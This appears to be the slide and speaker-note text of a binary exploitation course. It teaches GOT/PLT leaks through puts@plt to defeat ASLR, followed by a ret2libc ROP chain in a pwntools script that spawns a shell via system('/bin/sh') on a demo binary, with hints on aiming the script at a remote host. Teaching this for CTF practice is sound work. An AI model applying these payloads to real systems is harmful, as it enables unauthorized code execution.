puts: jmp [puts@GOT]
read: jmp [read@GOT]
0x400000 4
0x7FFF…
stack
GOT and PLT
libc
.text
• Every library function that is …
called from inside the binary has call puts@plt
a corresponding entry in those …
tables .plt
puts: jmp [puts@GOT]
read: jmp [read@GOT]
0x400000 5
And when we reach the ret-instruction, we return back to the text section, after the inital call
to puts.
Folie 80
0x7FFF…
stack
GOT and PLT
libc
.text
• Every library function that is …
called from inside the binary has call puts@plt
a corresponding entry in those RIP …
tables .plt
puts: jmp [puts@GOT]
read: jmp [read@GOT]
0x400000 6
And that’s it, that’s how library function get called with the help of the Global Offset Table
and Procedure Linkage Table.
Now what does that mean for us at attackers?
Folie 81
0x7FFF…
stack
GOT and PLT
libc
0x7fa5b6261690 puts: …
ret
.got
puts: 0x7fa5b6261690
read: 0x7fa5b62e9250
.text
Not randomized if not compiled …
as PIE call puts@plt
…
.plt
puts: jmp [puts@GOT]
read: jmp [read@GOT]
0x400000 7
These 3 sections, GOT, text and PLT are not randomized if the binary was not compiled as
Position Independent Executable.
We can abuse this to our advantage.
We already used gadgets from the text section in our last exercise.
All the entries of the PLT are great gadgets, because they represent functions in the libc
which we can use without knowing the base address of the libc.
So in our case, for example the puts function is interesting, because we can use it to leak
information from the process.
Puts takes an address as its only argument and will print out the content of this address to
stdout.
This is our leak gadget. Let’s look it up in Hopper.
(Hopper -> File -> Read Executable to Disassemble -> 03_demo_ASLR):
You can click on the main function in the list of labels on the left.
Here we have our binary again, and the three functions we are calling.
Puts to print the ‚give me the code‘ , read to read data from the user and printf to print the
given data.
When you look at the functions that are called, it is not directly called ‚puts‘ its j_puts, which
stands for jump puts and it is still in a location inside the binary. When we hover over it, we
see the address of it at 0x4XXXXX which is in the near of the text segment.
Let’s follow the reference by clicking on j_puts.
It brings us to the entry of puts in the PLT!
This address here (0x400470) is the address of our leak gadget, because it will directly jump
to puts in the libc when called from anywhere inside the binary.
Let’s keep that in mind.
As I explained, all the entries in PLT are trampoline functions. The program comes here to
look up the address of puts @ Global Offset Table and jump off to that.
However if you look at the GOT now, you dont see actual addresses. You see initializer values:
(The values on the right side, like the yellow highlighted one, are initializer values)
But after the first call to a function, the values get updated and hold the actual addresses of
the functions in the libc.
We can check that with gdb. We know that the entry of puts@GOT is at 0x601018.
We set a breakpoint after puts is called, run the program and look at the memory of
0x601018:
We see that the address that 0x601018 points to is now in a very different range, this is the
range for dynamic libraries. We also see that the entry of read@GOT at 0x601028 is still an
initializer value because the function did not get called yet.
We now know, that during the execution, the values in the GOT get updated and hold the
actual values of the functions in the libc.
So we can take one of one of these addresses of the GOT for example read@GOT
(0x601028), and give that to puts as an argument, in order to print the libc address of read
as our leak to the libc.
Folie 82
0x7FFF…
stack
GOT and PLT
Libc
0x7fa5b6261690 puts: …
ret
0x7fa5b62e9250
read: …
.got
puts: 0x7fa5b6261690
read: 0x7fa5b62e9250
.text
…
call puts@plt
…
.plt
puts: jmp [puts@GOT]
read: jmp [read@GOT]
0x400000 8
These functions in the GOT make a good target for leaking information, because if we learn
such an address, and we know which function it belongs to, we can recalculate the base
address of the libc.
Folie 83
0x7FFF…
stack
GOT and PLT
Libc
0x7fa5b6261690 puts: …
ret
0x7fa5b62e9250 OFFSET
libcbase = [leaked address] – OFFSET read: …
Libc-base
.got
puts: 0x7fa5b6261690
libcbase = 0x7fa5b62e9250 – OFFSET read: 0x7fa5b62e9250
.text
…
call puts@plt
…
.plt
puts: jmp [puts@GOT]
read: jmp [read@GOT]
0x400000 9
Like this.
We learned now that the entries in the PLT can be useful leak ROPgadgets, because they
represent a call to the function without knowing the libc base address .
Functions in the GOT can be great leak targets, because if we learn such an address, we can
recalculate the libc base address and can now do everything what we want (e.g. popping a
shell)!
Folie 84
RDI: [read@got]
RIP: puts@plt
10
To summarize:
In our ROP chain we want to call the puts function with the entry of read in the GOT as the
argument.
This will print the address of the read function inside the libc and therefore we have a leak of
an absolute lib c address.
To do that, we need to put the address of read @ GOT into RDI. This way it will serve as a
function argument.
And then we need to jump to the puts trampoline function inside the PLT.
Lets implement that in our exploit script.
(open exploit.py in the folder of the third demo)
It starts with the usual values. If you scroll down, this script is a bit different, it interacts with
the program:
The script is devided into steps and each step has a little description.
After a step is completed you can uncomment the next step.
So you can always try if your script still works and if not you’ll need to have a look.
So if you already have ideas how to do it, I strongly encourage you to try it first on your own
for a few minutes and come back to the following detailed description after it.
# STEP 1: FILLBUF
FILLBUF = 40
# STEP 2: extract offsets to 'system' and '/bin/sh' and 'read' from libc
Before we determine the offsets inside the libc, we look up which libc is loaded.
We find the offsets like before, but this time we also need to find the offset of our leak target read.
When you grep for “read” you will get many results. We see that all the function names and with an @,
so we can include the @ in our search to filter it better.
OFFSET_SYSTEM = 0x45390
OFFSET_BIN_SH = 0x18cd57
OFFSET_READ = 0xf7250 #offset in libc to the function we leak
PUTS_PLT:
We can follow the reference of j_puts in the main function to get to the PLT entry of puts:
(You can find the PLT also with the menu Navigate -> Show Section List -> search for ‘plt’)
MAIN_FUNC: The address of the main function (to trigger the buffer overflow again):
POP_RDI = 0x400673
PUTS_PLT =0x400470 # address of 'puts' in PLT
MAIN_FUNC = 0x4005b6 # address of 'main' function of binary
We can find the read@GOT entry by following the reference in the main function to the PLT and from
there to the GOT:
(You can find the GOT also with the menu Navigate -> Show Section List -> search for ‘got’)
Now we got all the components we need for the first stage.
# STEP 5: build ROP-chain to leak the address of read from the GOT.
# Finished by jumping back to the main-function
So first we need the POP RDI gadget to get the address of read@GOT into RDI.
Then we need the value that gets popped into RDI, the address of read@GOT
payload = "A" * FILLBUF
payload += p64(POP_RDI)
payload += p64(READ_AT_GOT)
After we get the leak we want to jump back to the main function:
payload = "A" * FILLBUF
payload += p64(POP_RDI)
payload += p64(READ_AT_GOT)
payload += p64(PUTS_PLT)
payload += p64(MAIN_FUNC)
Following lines in the script are already given and manage the interaction between us and
the program.
r.recvuntil("Give me the Code: ")
r.sendline(payload)
r.recvuntil("You gave me: ")
leak = r.recvuntil("Give me the Code:")
log.info("PAYLOAD: " + payload.encode("hex"))
log.info("LEAK : " + leak.encode("hex"))
We receive the line that asks for the code, then we send our payload. We know before it
mirrors back our input it states “You gave me: “, which we do not want to save.
Then we save everything between this and the next “Give me the Code” (which only appears
twice because we jumped back to main) as our leak.
# STEP 6: execute exploit to get a leak from the binary and analyse it
Somewhere in the leak we need to find the address of read in the libc!
We know the last 3 nibbles of the address, because the libc base address will always end
with 000. The offset of read inside the libc we know is 0xf7250. So the last 3 nibble need to be
250.
Because the addresses appear in little endian, we look for a pattern like this: 50 ?2
Now that we found it, we need to count the symbols until the address and strip them away.
The following 6 Bytes are our libc address (You might expect 8 bytes for 64 bit, but the first
byte in 64 bit is a Nullbyte which does not get printed by puts).
To count the symbols before our leak, I just copied the characters before to a text editor and
marked them, because I am lazy (and I wanted to keep the script short).
But we need to remember we want the number of bytes, but we printed hexdigits.
So we need to divide the result by to:
offset_of_read_address_in_leak = 58/2
Next in the script there are lines to extract the address of read in the libc from the leak.
Then it converts the bytestring into a valid address with u64().
We can run the script until Step 7 now.
This looks good, the address of read that we extracted looks like an address from the range
of dynamic libraries and it ends with 250. We can continue.
STEP 8: recalculate the libc base address and the addresses of system and ‘/bin/sh’:
We know the address of read, and the offset of read to the libc base.
This means we can recalculate the libc base address!
Now that we have the libc base address again, we can calculate the addresses of system and ‘/bin/sh’:
address_system = libc_base + OFFSET_SYSTEM
address_bin_sh = libc_base + OFFSET_BIN_SH
Running the script shows that the values we calculated seem good: the libc base address
ends with 000, all the other offsets are fine too.
# STEP 9: Profit
Now that we have the libc base address again, we can assemble the payload just as we are
used to. Get the address to the string ‘/bin/sh’ in RDI, and call system.
… that you can attach gdb to your pwntools script, which is sometimes pretty handy?
… to connect with a remote target you can use the template from the third example and you only
need to specify ip address and port in the execution command? (e.g. ./exploit.py 1.2.3.4 4444)
… that ropper has a chain generator, that automatically generates ROP chains that might work in
some cases? (The binaries from the course are too small unfortunately, the bigger the programs the
more ROP gadgets) (and ropper in general is a very nice tool)
Training:
https://picoctf.com/ (binaries in higher levels are a good exercise!)
https://ringzer0ctf.com (Linux pwnage – the important ones are online)
https://github.com/RPISEC/MBE (RPI-sec, lab 07)
overthewire
Every CTF is a good exercise ;)
(to train that specific, junior variants are also a good option – e.g. 35C3 junior ctf)
… These channels and trainings were both my practice and source of knowledge.
They serve as reference and recommendation by heart.
11
12